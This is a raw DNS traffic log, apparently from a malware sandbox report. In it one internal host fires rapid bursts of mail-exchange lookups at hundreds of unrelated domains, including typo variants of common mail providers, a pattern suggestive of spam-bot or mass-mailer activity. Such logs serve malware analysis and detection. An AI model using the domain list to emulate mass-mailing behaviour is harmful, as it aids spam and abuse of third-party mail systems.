                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.879523993 CEST192.168.2.3199.19.56.10x9df7Standard query (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.879913092 CEST192.168.2.3185.159.196.20x9df7Standard query (0)ginospizza.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.880326033 CEST192.168.2.3192.12.94.300x9df7Standard query (0)moldmasters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.880659103 CEST192.168.2.3192.12.94.300x9df7Standard query (0)iclud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.882637024 CEST192.168.2.3192.12.94.300x9df7Standard query (0)refinedprojects.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.888147116 CEST192.168.2.3192.58.128.300xadf7Standard query (0)availabledatingworld.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.890356064 CEST192.168.2.3192.12.94.300xadf7Standard query (0)genhr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.890841007 CEST192.168.2.3192.31.80.300xadf7Standard query (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.891297102 CEST192.168.2.3192.12.94.300xadf7Standard query (0)dead.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.891787052 CEST192.168.2.3192.12.94.300xadf7Standard query (0)compzon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.891978025 CEST192.168.2.3192.58.128.300xadf7Standard query (0)coe.intMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.892537117 CEST192.168.2.3199.19.56.10xadf7Standard query (0)memorialhermann.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.892537117 CEST192.168.2.3199.19.56.10xadf7Standard query (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.892914057 CEST192.168.2.3199.19.56.10xadf7Standard query (0)nbhn.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.893229008 CEST192.168.2.3192.12.94.300xadf7Standard query (0)harlandassociates.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.903518915 CEST192.168.2.3192.36.148.170xbcf7Standard query (0)krim.wsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.903827906 CEST192.168.2.3192.12.94.300xbcf7Standard query (0)minglebox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.904730082 CEST192.168.2.3192.12.94.300xbcf7Standard query (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.904737949 CEST192.168.2.3192.31.80.300xbcf7Standard query (0)vektor.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.905612946 CEST192.168.2.3192.12.94.300xbcf7Standard query (0)platinumthree.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.905612946 CEST192.168.2.3192.12.94.300xbcf7Standard query (0)cdd.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.906804085 CEST192.168.2.3192.12.94.300xbcf7Standard query (0)mailnesia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.906809092 CEST192.168.2.3193.176.144.220xbcf7Standard query (0)onet.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.909229994 CEST192.168.2.3195.243.137.260xbcf7Standard query (0)cci-dialog.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.917932987 CEST192.168.2.31.1.1.10x3901Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.982732058 CEST192.168.2.31.1.1.10x8906Standard query (0)ns-1497.awsdns-59.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.127017975 CEST192.168.2.31.1.1.10xfe96Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.147337914 CEST192.168.2.3205.251.197.2170xa7f8Standard query (0)mbn.nifty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.148367882 CEST192.168.2.31.1.1.10x98f6Standard query (0)ns2.moakt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.314575911 CEST192.168.2.364.31.33.500x53f9Standard query (0)disbox.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.326055050 CEST192.168.2.3156.154.125.700x62f9Standard query (0)polishprincess.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.326428890 CEST192.168.2.3216.92.151.2540x62f9Standard query (0)zzconsult.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.341444016 CEST192.168.2.394.23.153.360x72f9Standard query (0)people.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.341445923 CEST192.168.2.364.68.192.100x72f9Standard query (0)avivadirectory.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.342081070 CEST192.168.2.3104.243.174.2000x72f9Standard query (0)cp-tel.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.342473030 CEST192.168.2.3213.180.204.2130x72f9Standard query (0)sochi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.343277931 CEST192.168.2.31.1.1.10x3b0dStandard query (0)uns01.lolipop.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.467385054 CEST192.168.2.31.1.1.10x25efStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.608163118 CEST192.168.2.3157.7.190.910x7cfaStandard query (0)2525chintai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.608163118 CEST192.168.2.31.1.1.10x8481Standard query (0)pns3.cloudns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.767097950 CEST192.168.2.31.1.1.10xfb55Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.774755955 CEST192.168.2.31.1.1.10xaa20Standard query (0)ns378.canadianwebhosting.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.774755955 CEST192.168.2.3185.136.98.1110x18fbStandard query (0)pruamerican.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.814887047 CEST192.168.2.31.1.1.10x37e5Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.981874943 CEST192.168.2.31.1.1.10xb7b3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.985088110 CEST192.168.2.31.1.1.10xac92Standard query (0)dns1.minas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.985088110 CEST192.168.2.323.111.64.500xf3fbStandard query (0)sutcast.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.324147940 CEST192.168.2.345.32.160.600x3bfdStandard query (0)feital.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.324156046 CEST192.168.2.365.22.196.10x3bfdStandard query (0)visimax.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.324727058 CEST192.168.2.31.1.1.10x9cd0Standard query (0)ns1.mytrafficmanagement.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.374958992 CEST192.168.2.31.1.1.10xd0b1Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.489274025 CEST192.168.2.3139.144.190.940xe7fdStandard query (0)alltell.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.497432947 CEST192.168.2.31.1.1.10xc3f0Standard query (0)ns23.worldnic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.591377020 CEST192.168.2.31.1.1.10x456bStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.661171913 CEST192.168.2.3162.159.26.1320x92feStandard query (0)leewarner.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.661603928 CEST192.168.2.335.173.125.780x92feStandard query (0)fgpcpa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.663259983 CEST192.168.2.31.1.1.10x1f14Standard query (0)ns3.ilovedongbu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.075515985 CEST192.168.2.31.1.1.10x680Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.631383896 CEST192.168.2.3210.124.234.150x5b02Standard query (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.631881952 CEST192.168.2.31.1.1.10x8ab4Standard query (0)ns.w2hdns2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.899605036 CEST192.168.2.3162.248.50.1880x7403Standard query (0)segnidivik.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.900281906 CEST192.168.2.31.1.1.10xba6bStandard query (0)ns1.parkingcrew.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.076802015 CEST192.168.2.313.248.158.1590x3004Standard query (0)pylypiuk.qmal.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.077548027 CEST192.168.2.3156.154.100.30x3004Standard query (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.077827930 CEST192.168.2.3103.20.213.2510x3004Standard query (0)rapinfosolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.078352928 CEST192.168.2.31.1.1.10x563cStandard query (0)ns01.memail-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.695647001 CEST192.168.2.31.1.1.10x85baStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:29.075232983 CEST192.168.2.31.1.1.10x563cStandard query (0)ns01.memail-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:29.397695065 CEST192.168.2.31.1.1.10xe4d0Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:29.928652048 CEST192.168.2.31.1.1.10x610eStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.082547903 CEST192.168.2.31.1.1.10x563cStandard query (0)ns01.memail-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.313983917 CEST192.168.2.335.168.156.900x960dStandard query (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.314500093 CEST192.168.2.31.1.1.10x9f84Standard query (0)dns1.p04.nsone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.314748049 CEST192.168.2.31.1.1.10x6fa3Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.478988886 CEST192.168.2.3198.51.44.40x710eStandard query (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.479360104 CEST192.168.2.3163.114.216.490x710eStandard query (0)vitacy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.481559992 CEST192.168.2.3193.189.160.110x810eStandard query (0)siol.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.481987000 CEST192.168.2.3108.162.194.2110x810eStandard query (0)srsparivar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.482312918 CEST192.168.2.3103.224.182.60x810eStandard query (0)gaimil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.544884920 CEST192.168.2.3192.12.94.300xbf0eStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.559967995 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.560388088 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)eslite.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.560847998 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)247virtualassistant.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.561427116 CEST192.168.2.3199.7.83.420xcf0eStandard query (0)omicronlambda.ezbunko.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.561830997 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)netcourrier.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.562256098 CEST192.168.2.3199.19.56.10xcf0eStandard query (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.562720060 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)onlinesadik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.563124895 CEST192.168.2.3198.41.0.40xcf0eStandard query (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.563560009 CEST192.168.2.3192.31.80.300xcf0eStandard query (0)graystoneventures.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.563978910 CEST192.168.2.3192.12.94.300xcf0eStandard query (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.575494051 CEST192.168.2.3192.12.94.300xde0eStandard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.576186895 CEST192.168.2.3192.12.94.300xde0eStandard query (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.576822996 CEST192.168.2.3192.12.94.300xde0eStandard query (0)scbcameroun.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.577229023 CEST192.168.2.3192.12.94.300xde0eStandard query (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.577752113 CEST192.168.2.3192.12.94.300xde0eStandard query (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.578285933 CEST192.168.2.3192.12.94.300xde0eStandard query (0)logicsupport.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.579768896 CEST192.168.2.3192.12.94.300xde0eStandard query (0)adorfon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.580313921 CEST192.168.2.3192.36.148.170xde0eStandard query (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.580780029 CEST192.168.2.3192.12.94.300xde0eStandard query (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.581188917 CEST192.168.2.3192.12.94.300xde0eStandard query (0)gunz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.591078043 CEST192.168.2.3199.19.56.10xee0eStandard query (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.591485023 CEST192.168.2.3192.12.94.300xee0eStandard query (0)uf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.591859102 CEST192.168.2.3192.12.94.300xee0eStandard query (0)deepakfasteners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.592838049 CEST192.168.2.3192.12.94.300xee0eStandard query (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.593584061 CEST192.168.2.3156.154.124.650xee0eStandard query (0)paradigma.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.593858957 CEST192.168.2.3192.12.94.300xee0eStandard query (0)gaml.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.594281912 CEST192.168.2.3192.12.94.300xee0eStandard query (0)rightstartmortgage.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.594763041 CEST192.168.2.3192.31.80.300xee0eStandard query (0)zhuko.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.595267057 CEST192.168.2.3192.31.80.300xee0eStandard query (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.595715046 CEST192.168.2.3192.12.94.300xee0eStandard query (0)oranek.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.606602907 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.607023001 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.607476950 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.607918978 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.608421087 CEST192.168.2.3199.19.56.10xfe0eStandard query (0)victoriamansion.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.608839035 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.609307051 CEST192.168.2.3192.31.80.300xfe0eStandard query (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.609683037 CEST192.168.2.3192.31.80.300xfe0eStandard query (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.610061884 CEST192.168.2.3202.12.27.330xfe0eStandard query (0)vitor.tkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.610481977 CEST192.168.2.3192.12.94.300xfe0eStandard query (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.622211933 CEST192.168.2.3192.12.94.300xd0fStandard query (0)cpcgunion.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.622745037 CEST192.168.2.3192.12.94.300xd0fStandard query (0)linochaves.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.623173952 CEST192.168.2.3192.12.94.300xd0fStandard query (0)inosat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.623713017 CEST192.168.2.3156.154.124.650xd0fStandard query (0)availabledatingworld.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.624084949 CEST192.168.2.3192.12.94.300xd0fStandard query (0)sumix.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.624456882 CEST192.168.2.3192.12.94.300xd0fStandard query (0)dessy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.624780893 CEST192.168.2.3192.12.94.300xd0fStandard query (0)gmzil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.625278950 CEST192.168.2.3192.31.80.300xd0fStandard query (0)prtc.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.625670910 CEST192.168.2.3192.12.94.300xd0fStandard query (0)nyrmusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.626055002 CEST192.168.2.3198.41.0.40xd0fStandard query (0)me-cfs.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.638035059 CEST192.168.2.3192.58.128.300x1d0fStandard query (0)icsi.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.638596058 CEST192.168.2.3192.31.80.300x1d0fStandard query (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.639029980 CEST192.168.2.3192.12.94.300x1d0fStandard query (0)plenimagem.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.639554024 CEST192.168.2.365.22.196.10x1d0fStandard query (0)crosstech.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.640039921 CEST192.168.2.345.142.220.390x1d0fStandard query (0)immobiliarepunto.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.640594959 CEST192.168.2.3199.19.56.10x1d0fStandard query (0)vizas.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641017914 CEST192.168.2.3192.31.80.300x1d0fStandard query (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641468048 CEST192.168.2.3192.12.94.300x1d0fStandard query (0)hearst.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.642054081 CEST192.168.2.3192.12.94.300x1d0fStandard query (0)gmile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.642581940 CEST192.168.2.3192.31.80.300x1d0fStandard query (0)globcom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.653450966 CEST192.168.2.3192.12.94.300x2c0fStandard query (0)pythian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.653929949 CEST192.168.2.3185.159.196.20x2c0fStandard query (0)homebeautiful.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.654402018 CEST192.168.2.3192.12.94.300x2c0fStandard query (0)prtcnet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.655337095 CEST192.168.2.3192.31.80.300x2c0fStandard query (0)yotanka.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.655849934 CEST192.168.2.3192.12.94.300x2c0fStandard query (0)bvision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.656244993 CEST192.168.2.3192.12.94.300x2c0fStandard query (0)emial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.656709909 CEST192.168.2.3192.12.94.300x2c0fStandard query (0)beeld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.657557011 CEST192.168.2.3192.203.230.100x2c0fStandard query (0)placemail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.658057928 CEST192.168.2.365.22.196.10x2c0fStandard query (0)mdaltd.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.658493042 CEST192.168.2.3185.159.196.20x2c0fStandard query (0)cpacanada.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.669509888 CEST192.168.2.3199.7.91.130x3c0fStandard query (0)dergavoldop.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.670015097 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.670372009 CEST192.168.2.3198.41.0.40x3c0fStandard query (0)vob.suMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.670861959 CEST192.168.2.365.22.196.10x3c0fStandard query (0)culver.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.671252012 CEST192.168.2.3192.112.36.40x3c0fStandard query (0)fojab.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.671617985 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)rustici.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.672049046 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.672463894 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.672972918 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)outook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.673389912 CEST192.168.2.3192.12.94.300x3c0fStandard query (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.685034990 CEST192.168.2.365.22.196.10x4c0fStandard query (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.685467958 CEST192.168.2.3192.12.94.300x4c0fStandard query (0)domenicamato.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.685956001 CEST192.168.2.3192.12.94.300x4c0fStandard query (0)eilhk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.686374903 CEST192.168.2.3192.31.80.300x4c0fStandard query (0)1982.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.686793089 CEST192.168.2.345.142.220.390x4c0fStandard query (0)hotmial.itMX (Mail exchange)IN (0x0001)false
